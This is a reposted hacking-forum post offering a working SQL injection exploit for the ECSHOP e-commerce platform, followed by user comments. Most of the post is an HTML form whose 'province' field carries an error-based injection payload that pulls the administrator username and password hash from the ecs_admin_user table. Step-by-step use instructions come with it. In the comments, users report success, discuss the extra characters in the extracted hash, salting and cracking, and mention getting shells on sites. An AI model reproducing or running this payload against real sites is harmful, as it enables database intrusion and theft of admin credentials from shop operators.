ECSHOP各版本注入漏洞 EXP【我是转的】
漏洞作者:y35u
https://www.t00ls.com/viewthread.php?tid=21332&extra=&page=1
我(这是作者吧:小Dの马)给个代码,登陆目标网站,注册,选任意一件商品加入到购物车,然后结算,将下面的代码保存为html就可以注入了
<form name="form1" method="post">
ECSHOP通版本注入漏洞 2012圣诞版简单EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:none" value="1"/><br />
<textarea rows="5" style="font-family:Times New Roman;font-size:14pt;" cols="80" name="province">11'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(user_name,0x3a,password)FROM ecs_admin_user limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1#</textarea>
<input name="district" type="text" style="display:none" value="1294"/>
<input name="consignee" type="text" style="display:none" value="1111111"/>
<input name="email" type="text" style="display:none" value="[email protected]"/>
<input name="address" type="text" style="display:none" value="111111"/>
<input name="tel" type="text" style="display:none" value="1111111"/>
<input name="step" type="text" style="display:none" value="consignee"/>
<input name="act" type="text" style="display:none" value="checkout"/><br /><br />
地址:<input name="theAction" type="text" id="theAction" value="http://xxx.com/flow.php?step=consignee" size="50"><br /><br />
<input type="submit" value="配送至这个地址" onClick="this.form.action=this.form.theAction.value;" name="Submit"><br/><br />
</form>
好像视觉不是很好,呵呵。
评论34次
这个好像不能对各个版本通杀。。好像也有很多限制
测试成功,就是密码解不出来,呵呵
貌似这个报错注入方法爆出来后会在用户名前面+1 密码后面+1 所以是33位
昨天拿shell也是蛋疼了,公布的方法都失效了,后来成功拿到了
怎么我爆出来34位?????
怎么叫做各版本?
打印订单的地方现在过滤标识符了 蛋碎 求方法啊
密码出来的是33位 肯定提示不符合了。。去掉最后一个1 即可 高版本有 ec_salt 默认安装没打开 而且拿shell 你会更蛋疼。。。所以有拿shell方法捂手里 因为官方全部把公开的方法用正则限制了
确实。。2.7.3还有salt了
ECSHOP爆出来的密码好多解不了。蛋疼了
我也记得是33位!!
去掉最后一个1,爆出来的是33位的好像。
我记得之前好像是用md5的 刚刚去解密了下 竟然说不符合
密码解密好像还是个难题···